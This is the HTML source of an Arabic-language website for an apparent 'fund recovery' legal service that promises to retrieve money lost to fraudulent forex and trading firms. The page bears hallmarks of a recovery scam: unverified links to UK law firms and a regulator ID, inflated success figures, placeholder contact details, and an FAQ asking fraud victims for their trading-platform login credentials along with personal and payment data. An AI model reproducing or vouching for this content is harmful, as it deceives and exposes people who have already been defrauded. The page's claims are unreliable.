<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>مجموعة مكاتب عدالة</title>

    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet"
        href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.10.0/css/bootstrap-select.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Almarai:wght@300&amp;display=swap" rel="stylesheet">
    <link href="http://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" rel="stylesheet">

    <link rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/bootstrap-select@1.13.14/dist/css/bootstrap-select.min.css">

    <!-- Latest compiled and minified JavaScript -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap-select@1.13.14/dist/js/bootstrap-select.min.js"></script>

    <!-- (Optional) Latest compiled and minified JavaScript translation files -->
    <link href="css/owl.carousel.css" rel="stylesheet">
    <link href="css/owl.carousel.theme.min.css" rel="stylesheet">
    <link href="css/main.css" rel="stylesheet">

    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
        <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
        <![endif]-->

</head>

<body data-spy="scroll" data-target="#main-navbar">

    <!-- NavigationBar Section -->
    <nav class="navbar navbar-default navbar-fixed-top">
        <div class="container">
            <!-- Brand and toggle get grouped for better mobile display -->
            <div class="navbar-header">
                <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#main-navbar"
                    aria-expanded="false">
                    <span class="sr-only">Toggle navigation</span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>
                <a class="navbar-brand" href="#">
                    <img class="img-responsive" src="images/logo.png" alt="logo">
                </a>
            </div>

            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse" id="main-navbar">
                <ul class="nav navbar-nav navbar-right">
                    <li class="active"><a href="#header">الرئيسية <span class="sr-only">(current)</span></a></li>
                    <li><a href="#choose">لماذا نحن</a></li>
                    <li><a href="#practice">مجالاتنا</a></li>
                    <li><a href="#slider-1">قضايانا</a></li>
                    <li><a href="#team">انجازاتنا</a></li>
                    <li><a href="#clients">عملائنا</a></li>
                    <li><a href="#faq">FAQ</a></li>
                    <li><a href="#contact">اتصل بنا</a></li>
                </ul>
            </div><!-- /.navbar-collapse -->
        </div><!-- /.container-fluid -->
    </nav>

    <!-- Header Section -->
    <header id="header" class="header overlay-dark">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div dir="rtl">
                        <div class="col-sm-6 intro-sec text-center">
                            <h1>مجموعة مكاتب عدالة الدولية للحقوق عنوانك الاول
                            </h1>
                            <h3>ولكم من يمثلكم</h3>
                            <h3>استرجع اموالك من عمليات الاحتيال والنصب</h3>
                            <h3>بالتعاون مع مكاتب <a href="https://www.brookman.co.uk/">Brookman</a></h3>
                        </div>
                        <div class="col-sm-5 intro-sec">
                            <form method="POST" action="/mailer/ClientMailer.php">
                                <h1>تواصل معنا</h1>
                                <input class="form-control" id="name" name="name" type="text" placeholder="الاسم الكامل"
                                    required>
                                <input class="form-control" id="phone" name="phone" type="tel" placeholder="رقم الهاتف" required>
                                <input class="form-control" id="email" name="email" type="email" placeholder="البريد الالكتروني"
                                    required>
                                <input class="form-control" id="country" name="country" type="text" placeholder="الدولة" required>
                                <!-- <select class="selectpicker countrypicker" data-flag="true" multiple></select> -->
                                <textarea class="form-control" name="message" id="message" cols="30" rows="10"></textarea>
                                <button class="btn btn-default" type="submit">تواصل معنا</button>
                            </form>
                        </div>
                    </div>
                </div>
                <div class="col-md-6">

                </div>
            </div>
        </div>
        <!-- <div class="flags">
            <h1>موثقون من قبل مجلس التعاون الخليحي</h1>
        </div> -->
    </header>

    <!-- Fun Facts -->
    <section id="fun" class="fun">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="title-box">
                        <p class="section-subtitle">نحن نعرفون ب</p>
                        <h2 class="section-title">من نحن</h2>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="col-sm-4">
                    <div class="fun-box">
                        <p class="fun-number">200+</p>
                        <p class="fun-title">القضايا التي نترافع عنها</p>
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="fun-box">
                        <p class="fun-number">96.5%</p>
                        <p class="fun-title">القضايا الرابحه</p>
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="fun-box">
                        <p class="fun-number">$25,000,000</p>
                        <p class="fun-title">الاموال المسترجعه</p>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- CTA -->
    <section id="cta" class="cta">
        <div class="container">
            <div class="cta-bg">
                <div class="row">
                    <div class="col-sm-10 col-sm-offset-1">
                        <p>
                            لا تتردد بالتواصل معنا, كل ما عليك فعله هو تسجيل بياناتك وسيقوم احد المحامين المختصين لدينا
                            بالتواصل معك. تحقيق العدالة بأسترجاع اموالك هو اختصاصناالاول على الانترنت, نعدكم بأننا سنبذل
                            كل ما بوسعنا في استرجاع اموالكم المسروقة من شركات الفوركس
                        </p>
                    </div>
                    <div class="col-sm-6">
                        <h1>
                            للاستشارة المجانية<br>
                            <small>اتصل الان</small>
                        </h1>
                    </div>
                    <div class="col-sm-6">
                        <div class="cta-btn">
                            <a href="tel:+442080897572"><span class="ion-android-call"></span>
                                (+44)-20-8089-7572</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Why choose us -->
    <section id="choose" class="choose overlay-light">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="title-box">
                        <p class="section-subtitle">عنوانكم الاول للقضايا الماليه العالقه</p>
                        <h2 class="section-title">لماذا تختارنا</h2>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="col-sm-4">
                    <div class="choose-box">
                        <span class="choose-icon ion-social-angular-outline"></span>
                        <h3 class="choose-title">افضل المحامين في افضل المجالات</h3>
                        <p class="choose-detail">
                            اختصاصنا الرئيسي يكمن في استرجاع الأموال واستردادها من شركات الفوركس والتداول النصابة
                            والوهمية على الإنترنت
                        </p>
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="choose-box">
                        <span class="choose-icon ion-compose"></span>
                        <h3 class="choose-title">نترافع عن افضل الشركات</h3>
                        <p class="choose-detail">
                            لدينا شبكة محامين مختصين في استرجاع الأموال من شركات الفوركس النصابة وباقي شركات الشركات
                            الوهمية.
                        </p>
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="choose-box">
                        <span class="choose-icon ion-android-bulb"></span>
                        <h3 class="choose-title">سرعة الإجراءات</h3>
                        <p class="choose-detail">
                            يتم إجراء الفحص بناء على المعلومات المزودة من العملاء ثم يتم البدء بالإجراءات فوراً بدون أية
                            تأخيرات أو تعقيدات
                        </p>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <section class="viedo-section">
        <h1>احد عملائنا</h1>
        <video controls autoplay loop>
            <source src="/assets/media/viedo1.mp4" type="video/mp4">
            <source src="/assets/media/viedo1.ogg" type="video/ogg">
            Your browser does not support the video tag.
        </video>
    </section>

    <!-- Practice areas -->
    <section id="practice" class="practice">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="title-box">
                        <p class="section-subtitle">افحص مجالات مكتبنا</p>
                        <h2 class="section-title">نمثلكم اين ما كنتم وفي جميع المجالات القانونية</h2>
                    </div>
                </div>
            </div>

            <div class="col-sm-6 col-md-4">
                <div class="practice-box">
                    <img class="img-responsive img-full" src="images/Prac-3.jpg">
                    <div class="overlay">
                        <div class="c-table">
                            <div class="ct-cell">
                                <span class="paractice-icon ion-android-car"></span>
                                <h3 class="practice-title">حوادث سير</h3>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="col-sm-6 col-md-4">
                <div class="practice-box">
                    <img class="img-responsive img-full" src="images/Prac-4.jpg">
                    <div class="overlay">
                        <div class="c-table">
                            <div class="ct-cell">
                                <span class="paractice-icon ion-ios-home"></span>
                                <h3 class="practice-title">شراء منازل او شركات</h3>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="col-sm-6 col-md-4">
                <div class="practice-box">
                    <img class="img-responsive img-full" src="images/Prac-6.jpg">
                    <div class="overlay">
                        <div class="c-table">
                            <div class="ct-cell">
                                <span class="paractice-icon ion-social-usd"></span>
                                <h3 class="practice-title">Medical malpractice</h3>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        </div>
    </section>

    <!-- Consultation -->
    <section id="consultation" class="consultation">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="title-box">
                        <p class="section-subtitle">نتميز بتقديم خدمات الاستشارات المجانية للأفراد والمؤسسات والشركات
                            بكل ما يتعلق بهذا المجال تحديداً،</p>
                        <h2 class="section-title">اطلب استشارتك المجانية الان</h2>
                    </div>
                </div>
            </div>

            <div class="row">
                <form id="consultation-form" class="consultation-form" method="POST" action="/mailer/ClientMailer.php">
                    <div class="form-group">
                        <div class="col-sm-4">
                            <input type="text" class="form-control" id="name" name="name" placeholder="الاسم الكامل">
                        </div>
                    </div>
                    <div class="form-group">
                        <div class="col-sm-4">
                            <input type="text" class="form-control" id="phone" name="phone" placeholder="رقم الهاتف">
                        </div>
                    </div>
                    <div class="form-group">
                        <div class="col-sm-4">
                            <input type="text" class="form-control" id="email" name="email"
                                placeholder="البريد الالكتروني">
                        </div>
                    </div>
                    <!-- <div class="form-group">
                                <div class="col-sm-4">
                                    <select class="selectpicker" data-live-search="true" data-width="100%">
                                        <option data-tokens="family">Family Law</option>
                                        <option data-tokens="business">Business Law</option>
                                        <option data-tokens="civil litigation">Civil Litigation</option>
                                        <option data-tokens="other">Other</option>
                                    </select>
                                </div>
                            </div> -->
                    <div class="form-group">
                        <div class="col-sm-12">
                            <textarea class="form-control" rows="8" placeholder="اكتب قصتك" id="message"
                                name="message"></textarea>
                            <!-- <input type="text" class="form-control" id="case-des" placeholder="Case Description..."> -->
                        </div>
                    </div>
                    <div class="col-sm-4 col-sm-offset-4">
                        <button id="cnfsubmit" type="submit" class="btn btn-default btn-block btn-cn">ارسل الان</button>
                    </div>
                </form>
            </div>
        </div>
    </section>

    <!-- Slider 1 -->
    <section id="slider-1" class="slider-1 overlay-light">
        <div class="container">
            <div class="row">
                <div class="col-sm-4 hidden-xs">
                    <img class="img-responsive img-full mb0" src="images/familly.png" alt="familly">
                </div>
                <div class="col-sm-7 col-sm-offset-1">
                    <div id="slider_1" class="owl-carousel">
                        <div class="item">
                            <div class="slider-1-item-box">
                                <span class="slider-icon ion-ios-people"></span>
                                <h2>تعتبر مجموعة مكاتب عدالة </h2>
                                <p>
                                    من الأوائل محلياً وعالمياً التي اختصت في استرجاع واسترداد الأموال من شركات النصب
                                    والاحتيال المنتشرة على شبكة الإنترنت، بدأ المكتب بطاقم عمل يتألف من 3 محامين، ثم
                                    تطورنا لنصل إلى أكثر من 25 مكتب محامي موزعين على عدد من الدول العربية والأجنبية، ذلك
                                    ما أعطانا نقطة قوة في متابعة قضايانا وملفاتنا بمختلف الدول التي تتمركز فيها شركات
                                    الاحتيال مما جعلنا نصل إلى الأموال المسروقة بطرق أسهل وبسلاسه اكثر.
                                </p>
                            </div>
                        </div>
                        <div class="item">
                            <div class="slider-1-item-box">
                                <span class="slider-icon ion-ios-people"></span>
                                <h2>لماذا مجموعة عدالة</h2>
                                <p>
                                    لأننا الأفضل محلياً وعالمياً في مجال القضاء واصحاب باع طويل في مجال القضاء العام,
                                    لأننا اصحاب خبرة لاكثر من ثلاثين عام في مجال القضايا الماليه العالقه والتي سنضعها في
                                    خدمتكم ومرافقتكم وتمثيلكم اما الجهات المختصه
                                </p>
                            </div>
                        </div>
                        <div class="item">
                            <div class="slider-1-item-box">
                                <span class="slider-icon ion-ios-people"></span>
                                <h2>تعاملاتنا</h2>
                                <p>
                                    مكتبنا يخدم اكثر من 20 دولة عالمياً في مجال العقارات والاستثمار في (الخليح العربي -
                                    الشرق الاوسط واوروبا), نحن نمثل اكبر الشركات محلياً وعالمياً, نمثل عملائنا امام
                                    البنوك المحلية والدولية وسلطة الضرائب
                                </p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Team -->
    <section id="team" class="team">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="title-box">
                        <p class="section-subtitle">فريق العمل</p>
                        <h2 class="section-title">ادارة المكاتب</h2>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="col-sm-4">
                    <div class="team-box">
                        <img class="img-responsive img-full" src="images/team-5.jpg" alt="team">
                        <div class="team-detail">
                            <ul>
                                <li>
                                    <h3>عبدالله عبدالرحمن القعيمي</h3>
                                </li>
                                <li>
                                    <h4>د. محامي</h4>
                                </li>
                                <li>مدير المكتب السعودية</li>
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="team-box">
                        <img class="img-responsive img-full" src="images/team-2.jpg" alt="team">
                        <div class="team-detail">
                            <ul>
                                <li>
                                    <h3>مناور مبارك الفضلي</h3>
                                </li>
                                <li>
                                    <h4>مسشار قانوني</h4>
                                </li>
                                <li>مدير المكتب الامارات</li>
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="team-box">
                        <img class="img-responsive img-full" src="images/team-3.jpg" alt="team">
                        <div class="team-detail">
                            <ul>
                                <li>
                                    <h3>سلطان حسن الرشيدي</h3>
                                </li>
                                <li>
                                    <h4>د. محامي</h4>
                                </li>
                                <li>مدير المكتب اليمن</li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Clients -->
    <section id="clients" class="clients">
        <div class="container-fluid">
            <div class="row">
                <div class="col-sm-12">
                    <div class="title-box">
                        <p class="section-subtitle">من اكبر</p>
                        <h2 class="section-title">انجازاتنا</h2>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="col-sm-offset-1 col-sm-2">
                    <div class="client-box">
                        <a href="https://solicitors.lawsociety.org.uk/office/467287/dmh-stallard-llp">
                            <img class="img-responsive re-size" src="images/meddle/com-1.png" alt="com">
                        </a>
                    </div>
                </div>
                <div class="col-sm-1">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-2.png" alt="com">
                        </a>
                    </div>
                </div>
                <div class="col-sm-1">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-3.png" alt="com">
                        </a>
                    </div>
                </div>
                <div class="col-sm-2">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-4.png" alt="com">
                        </a>
                    </div>
                </div>
                <div class="col-sm-2">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-5.png" alt="com">
                        </a>
                    </div>
                </div>
            </div>
            
        </div>
    </section>

    <!-- Testimonial -->
    <!-- <section id="testimonial" class="testimonial">

    </section> -->

    <!-- FAQ -->
    <section id="faq" class="faq overlay-light">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="title-box">
                        <p class="section-subtitle">تود ان تعرف المزيد</p>
                        <h2 class="section-title">اسئلة شائعه</h2>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="col-sm-12">
                    <div class="panel-group" id="accordion" role="tablist" aria-multiselectable="true">
                        <div class="panel panel-default">
                            <div class="panel-heading" role="tab" id="headingOne">
                                <h4 class="panel-title">
                                    <a role="button" data-toggle="collapse" data-parent="#accordion" href="#collapseOne"
                                        aria-expanded="true" aria-controls="collapseOne">
                                        هل يمكن حقاً إسترجاع الأموال من الشركات النصابة؟ </a>
                                </h4>
                            </div>
                            <div id="collapseOne" class="panel-collapse collapse in" role="tabpanel"
                                aria-labelledby="headingOne">
                                <div class="panel-body">
                                    نعم يمكن خطوات إسترجاع الأموال من الشركات النصابة وفق قواعد وشروط معينة ويجب على من
                                    تعرض للاحتيال اتباع هذه الخطوات بشكل سريع دون التعرض لضغوطات نفسية حيث أن العامل
                                    النفسي مهم جداً والمتابعة المستمرة لملاحقة الشركات النصابة تحتاج لنفس طويل ويمكن
                                    التعرف من خلال المقال الكامل على ثقة على هذه الخطوات للبدء بشكل فوري والآن بعملية
                                    الإسترداد المالي.
                                    <ul dir="rtl">
                                        <li>أن يكون لديك دليل، وإثباتات على عملية الاحتيال التي تمت ممارستها في حقك</li>
                                        <li>أن تكون الشكوى مقدمة في خلال 6 سنين من عملية النصب التي تعرضت لها، لا أكثر،
                                            لأن لو طالت المدة عن ذلك قد لا يتمكن المختصين من استرداد أموالك مرة أخرى.
                                        </li>
                                        <li>أن تكون الشكوى مرفق بها كافة التفاصيل المتعلقة بالبيانات، والاسم، والتاريخ،
                                            وعمليات التحويل.</li>
                                        <li>ارفاق ملف الشكوى ببيانات عن اسم صاحب الحساب، ورقم هاتفه كما هو مؤيد في شركة
                                            التداول، واسم شركة التداول، بالإضافة إلى مبلغ الإيداع الإجمالي، وتاريخ
                                            الإيداعات التي تم وضعها في الحساب، وطبيعة الحساب الحالية هل يمكن الوصول إليه
                                            أم لا، والموقع الإلكتروني التابع لشركة التداول، وبيانات دخول منصة التداول
                                            الخاصة بالمتداول، والطريقة التي تم من خلالها دفع الأموال، والمستندات،
                                            والعقود التي تم توقيعها بين العميل، وشركة الوساطة.</li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                        <div class="panel panel-default">
                            <div class="panel-heading" role="tab" id="headingTwo">
                                <h4 class="panel-title">
                                    <a class="collapsed" role="button" data-toggle="collapse" data-parent="#accordion"
                                        href="#collapseTwo" aria-expanded="false" aria-controls="collapseTwo">
                                        استشارة مباشرة على كيفية استرجاع الاموال من الشركات النصابة
                                    </a>
                                </h4>
                            </div>
                            <div id="collapseTwo" class="panel-collapse collapse" role="tabpanel"
                                aria-labelledby="headingTwo">
                                <div class="panel-body">
                                    بالنهاية، يمكن لك البدء بالإجراءات اللازمة بحق أي شركة تداول قامت بالإحتيال عليك أو
                                    أي جهة اخرى قامت بالإحتيال المالي عليك، لكن لو كنت مازلت بحاجة لمساعدة مباشرة يمكن
                                    التواصل معنا في موقع ثقة وسوف نقوم بتقديم كامل الدعم شرح الخطوات بكل تفصيل على كيفية
                                    البدء بعملية إسترداد مالي من الشركات النصابة، اضغط على " تواصل معنا الآن " وسوف يكون
                                    هناك من يساعدك عبر محادثة الواتس-آب من فريق عمل الموقع.
                                </div>
                            </div>
                        </div>
                        <div class="panel panel-default">
                            <div class="panel-heading" role="tab" id="headingThree">
                                <h4 class="panel-title">
                                    <a class="collapsed" role="button" data-toggle="collapse" data-parent="#accordion"
                                        href="#collapseThree" aria-expanded="false" aria-controls="collapseThree">
                                        هل عملية إسترجاع الأموال من الشركات النصابة تحتاج وقت طويل؟ </a>
                                </h4>
                            </div>
                            <div id="collapseThree" class="panel-collapse collapse" role="tabpanel"
                                aria-labelledby="headingThree">
                                <div class="panel-body">
                                    ليس هناك وقت محدد لعمية إسترجاع الأموال من الشركات النصابة لكن تم فتح الشكوى بشكل
                                    أسرع كلما كان الوقت لمصلحة المتدقم بالشكوى كان متداول أو مستثمر أو أي شخص أخر تعرض
                                    للإحتيال لذلك ننصح الجميع بقراءة المقال كامل بتمعن والبدء بأخذ اجراءات قانونية بحق
                                    الجهات التي عرضتك للإحتيال المالي.
                                </div>
                            </div>
                        </div>
                        <div class="panel panel-default">
                            <div class="panel-heading" role="tab" id="headingThree">
                                <h4 class="panel-title">
                                    <a class="collapsed" role="button" data-toggle="collapse" data-parent="#accordion"
                                        href="#collapseFour" aria-expanded="false" aria-controls="collapseFour">
                                        هل إسترجاع الأموال من الشركات النصابة عملية صعبة؟ </a>
                                </h4>
                            </div>
                            <div id="collapseFour" class="panel-collapse collapse" role="tabpanel"
                                aria-labelledby="headingThree">
                                <div class="panel-body">
                                    لا عملية إسترجاع الأموال من الشركات النصابة ليست عملية صعبة لكن تحتاج هذه العملية
                                    لنفس طويل والبدء بتقديم شكاوي لجهات مختلفة من ضمنها الهيئات المرخصة في بلدك و وزارة
                                    التجارة وتقديم شكوى بحق كل جهة كانت أو مؤسسة ساعدت على تسهيل الإحتيال، من ضمن هذه
                                    المؤسسات المالية وغيرها التي تتعاون مع المحتالين في سحب أموال المستثمرين.
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Contact -->
    <section id="contact" class="contact">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="title-box">
                        <p class="section-subtitle">للتواصل</p>
                        <h2 class="section-title">يمكنك التواصل معنا</h2>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="col-sm-6">
                    <img src="images/logo.png" alt="logo" class="contact-logo">
                    <p>
                        سيقوم أحد الفروع لدينا ” الناطقين بالعربية ” بالتواصل معكم بأسرع وقت ممكن والحصول على تفاصيل
                        مشكلتكم من أجل العمل على استرداد أموالكم المسروقة والمفقودة لدى شركات النصب والاحتيال
                    </p>
                    <p>
                        ملاحظة: نحن نستخدم أرقام دولية ومحلية للاتصال عليكم وذلك حسب المكتب الذي نقوم بالإتصال منه
                    </p>
                    <ul>
                        <li><span class="ion-location"></span>322, Adress, Lorem Ipsum Avenue, London, Earth</li>
                        <li><span class="ion-android-call"></span>(888) 123-456-7890</li>
                        <li><span class="ion-paper-airplane"></span>thisisfakeemail@noreply.com</li>
                    </ul>
                </div>
                <div class="col-sm-6">
                    <form id="contactForm" method="POST" action="/mailer/ClientMailer.php">
                        <div class="input-group">
                            <span class="input-group-addon">
                                <i class="ion-person"></i>
                            </span>
                            <input class="form-control" type="text" id="name" placeholder="الاسم الكامل" name="name"
                                required>
                        </div>
                        <div class="input-group">
                            <span class="input-group-addon">
                                <i class="ion-android-call"></i>
                            </span>
                            <input class="form-control" id="phone" name="phone" type="tel" placeholder="رقم الهاتف"
                                required>
                        </div>
                        <div class="input-group">
                            <span class="input-group-addon">
                                <i class="ion-email"></i>
                            </span>
                            <input class="form-control" id="email" name="email" type="email"
                                placeholder="البريد الالكتروني" required>
                        </div>
                        <div class="input-group">
                            <span class="input-group-addon custom-addon">
                                <i class="ion-chatbubbles"></i>
                            </span>
                            <textarea class="form-control" rows="8" placeholder="اكتب قصتك" id="message" name="message"></textarea>
                        </div>
                        <button id="cfsubmit" type="submit" class="btn btn-default btn-block">ارسل توجهك <span
                                class="ion-paper-airplane"></span></button>
                    </form>

                    <div id="contactFormResponse"></div>
                </div>
            </div>
        </div>
    </section>



    <!-- Footer -->
    <footer class="footer">
        <div class="container">
            <div class="row">
                <div class="col-sm-6">
                    <p>
                        مجموعة مكاتب عدالة
                    </p>
                </div>
                <div class="col-sm-6">
                    <div class="footer-social">
                        <a href="https://www.facebook.com/Adalacapital-107519375020715"><i class="ion-social-facebook"></i></a>
                        <a href="#"><i class="ion-social-linkedin-outline"></i></a>
                        <a href="#"><i class="ion-social-skype-outline"></i></a>
                        <a href="#"><i class="ion-social-twitter"></i></a>
                    </div>
                    <div>
                         <label for="">SRA ID: 490576</label> 
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-sm-offset-1 col-sm-2">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-6.jpg" alt="com">
                        </a>
                    </div>
                </div>
                <div class="col-sm-2">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-7.png" alt="com">
                        </a>
                    </div>
                </div>
                <div class="col-sm-2">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-8.png" alt="com">
                        </a>
                    </div>
                </div>
                <div class="col-sm-2">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-9.png" alt="com">
                        </a>
                    </div>
                </div>
                <div class="col-sm-2">
                    <div class="client-box">
                        <a href="#">
                            <img class="img-responsive re-size" src="images/meddle/com-10.jpg" alt="com">
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </footer>

    <!-- Scripts -->
    <script src="js/jquery-1.12.3.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.10.0/js/bootstrap-select.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/script.js"></script>
</body>

</html>